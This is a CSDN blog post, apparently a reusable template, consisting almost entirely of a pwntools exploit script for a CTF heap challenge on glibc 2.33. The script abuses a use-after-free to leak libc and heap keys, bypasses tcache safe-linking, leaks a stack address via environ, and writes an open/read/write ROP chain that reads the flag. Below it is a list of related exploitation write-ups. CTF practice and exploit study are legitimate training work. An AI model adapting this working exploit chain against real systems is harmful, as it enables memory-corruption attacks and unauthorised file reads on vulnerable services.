glibc2.33 uaf+orw通过environ利用模板

于 2022-11-14 21:25:01 发布
阅读量147 收藏
点赞数
分类专栏: 堆利用模板 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FUCKING12/article/details/127855957
版权 
from pwn import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
p = process('./pwn')
# p=remote('1.14.71.254',28880)
#elf=ELF('./pwn')

#p = remote('59.110.24.117',33320)
libc = ELF('./libc.so.6')
rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))

def dbg():
    gdb.attach(p)
    pause()
menu = 'Choice: '

def add():
    p.sendlineafter(menu, '1')

def show(index):
    p.sendlineafter(menu, '3')
    p.sendlineafter('Idx:', str(index))

def delete(index):
    p.sendlineafter(menu, '2')
    p.sendlineafter('Idx:', str(index))

def edit(index, size, content):
    p.sendlineafter(menu, '4')
    p.sendlineafter('Idx:', str(index))
    p.sendlineafter('Size:', str(size))
    p.sendafter('Content:', content)

for i in range(10):
    add()
for i in range(9):
    delete(i)
edit(7,0x10,'\x01')
show(7)
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1e0c01
lg('libc_base')
environ = libc_base + libc.sym['environ']
lg('environ')
edit(7,0x10,'\x00')
show(0)
ru('\n')
key=u64(p.recv(5).ljust(8,'\x00'))
heapbase=key<<12
lg('key')
payload1=p64(key^environ)+p64(0)
# edit(6,0x10,payload1)
for i in range(5):
    add()#10-14
edit(1,0x10,payload1)
# dbg()
add()#15
add()#16
show(16)
# show(11)
stack_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x138
lg('stack_addr')
# edit(6,)
delete(3)
delete(4)
payload2=p64(key^stack_addr)+p64(0)
edit(4,0x10,payload2)
add()#17
add()#18
pop_rdi_ret = libc_base + 0x0000000000028a55
#pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rsi_ret = libc_base + 0x000000000002a4cf
#pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx_ret = 0x00000000000c7f32 + libc_base
read_addr = libc_base + libc.sym['read']
open_addr = libc_base + libc.sym['open']
write_addr = libc_base + libc.sym['write']
flag_addr = stack_addr + 0x10
payload3 = p64(0) * 2
payload3 += b'./flag\x00\x00'
# open('./flag', 0)
payload3 += p64(pop_rdi_ret) + p64(flag_addr) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)

# read(3, stack_addr - 0x200, 0x50)
payload3 += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(read_addr)

# write(1, stack_addr - 0x200, 0x50)
payload3 += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(write_addr)
dbg()
edit(18,0x100,payload3)
# dbg()
irt()

参考链接:https://blog.csdn.net/zzq487782568/article/details/125561195

thna0s
关注
专栏目录
理清gcc、g++、libc、glibc、libstdc++的关系
tianyu的专栏 - Linux site:blog.csdn.net/wishfly
03-14 1498
gcc
二进制安全之——栈相关漏洞
PICACHU+++的博客
09-22 1871
栈主要是用于存储程序运行过程中的局部信息,大小不一,动态增长。栈的内存一般根据函数栈来进行划分(不用函数的程序很少见),不同的函数栈之间是互相隔离的,从而能实现函数的有效切换。函数栈上存储的信息一般包括:临时变量(包括栈保护哨carry)、函数栈的返回栈基址(bp)、函数的返回地址(ip)。
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 658
这个题开了沙箱,有uaf利用思路:借助environ泄露栈地址,利用uaforw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
Buuctf(pwn) ez_pz_hackover_2016 泄露栈地址,retshellcode;调试计算
半岛铁盒的博客
08-13 967
32位,开启了RELRO保护,堆栈地址随机化 没有开启nx保护,可利用写入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 dest大小根本不是0x32,要动态调试看大小其实是 0x16 利用思路: 1.往s参数里写入shellcode,执行vuln函数后让dest造成溢出
栈泄漏实践报告
qq_24599583的博客
10-09 680
0x00 栈溢出是啥呀! 栈溢出是指在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。 例如:read(0, buf, 80); 要想栈溢出,我们????️满足两个条件。 第一,程序要有向栈写入数据的行为; 第二,程序并不限制写入数据的长度。 我们知道,UNIX本身以及其上的许多应用程序都是用C语言编写的,C语言不检查缓冲区的边界。在某些情况下,如果用户输入的数据长度超过应用程序给定的缓冲区,就会覆盖其他数据区。这称作“堆栈溢出或缓冲溢出”。 如果想用栈溢出来执行攻击指令,就要在溢
堆技巧 数组反向越界泄露地址
tbsqigongzi的博客
09-02 318
痛苦痛苦痛苦,调了半天才找到数组起始地址,还是自己太菜了,好好记录一下这题题目给了libc,2.31的题嗯,可以考虑覆盖got表或者hook函数打开ida发现是c++的题,认真分析一下。
glibc-2.33.tar.gz
08-04
glibc是GNU发布的libc库,即c运行库。glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc。该代码是从官方下载而来,未做任何改动,使用linux进行产品开发必不可少,每个标准库里函数都可以查看实现...
glibc-2.33 源码
07-08
glibc-2.33 源码
setcontext+orw
「 虚幻私塾」
01-27 811
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 setcontext+orw 大致可以把2.27,2.29做为两个分界点。 我们先来讨论 2.27 及以下的 setcontext + orw 的写法。 首先 setcontext 是什么?了解过 SROP 的师傅应该知道 pwntools 自带了一款可以控制寄存器值的工具。模
glibc stdc++.so
01-10
stdc++.so是glibc中的C++标准库实现,包含了C++标准模板库(STL)和其他C++特定功能,如异常处理、RTTI(运行时类型信息)等,是开发和运行C++程序不可或缺的部分。 在Oracle 11g R2的安装过程中,由于其部分组件是...
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
泄露地址和利用总结
inquisiter
07-17 877
已知libc.so 栈执行保护---------->调用libc.so system("/bin/sh") 关闭ASLR system在内存中的地址不会变化 如果elf中调用了print和read,那么我们就可以搜索内存直接调用。 如果开启ASLR, 我们可以根据got得到print@plt和system在libc.so中的偏移得到system 的地址。 read@plt ...
堆,栈,内存泄露,内存溢出介绍
u013485792的专栏
05-04 1690
简单的可以理解为: heap(堆):是由malloc之类函数分配的空间所在地。地址是由低向高增长的。 stack(栈):是自动分配变量,以及函数调用的时候所使用的一些空间。地址是由高向低减少的。 一、预备知识—程序的内存分配 一个由c/C++编译的程序占用的内存分为以下几个部分 1、栈区(stack)— 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等。其操作方式类似于数据结
BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc
半岛铁盒的博客
08-18 389
思路 我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。 from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26441) elf=ELF('./level4') write_plt=elf.plt['write'] read_got=elf.g..
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 2965
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2345
在libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
GO-MAZE-v4(go语言,栈溢出,orw
m0_51251108的博客
09-25 636
浙江省第五届大学生网络与信息安全竞赛决赛的一道pwn
pwn-GUESS
aitangdao4981的博客
09-03 215
参考了其他wp之后才慢慢做出来的 记录一下 首先checksec一下 有canary 放到IDA看下源码 运行流程大概是 有三个fork 即三次输入机会,于是无法爆破cannary 本题用的是SSP leak,当canary被覆盖是就会触发__stack_chk_fail函数,其中会打印字符串argv[0],覆盖它就能实现任意地址读 源码中有open("./flag...
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1377
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
远程主机可能不符合 glibc 和 libstdc++ VS Code 服务器的先决条件
最新发布
02-04
远程主机可能不符合 glibc 和 libstdc++ VS Code 服务器的先决条件的情况有以下几种: 1. 操作系统版本不兼容:VS Code 服务器要求运行在支持 glibc 2.27 或更高版本的 Linux 操作系统上。如果远程主机的操作系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值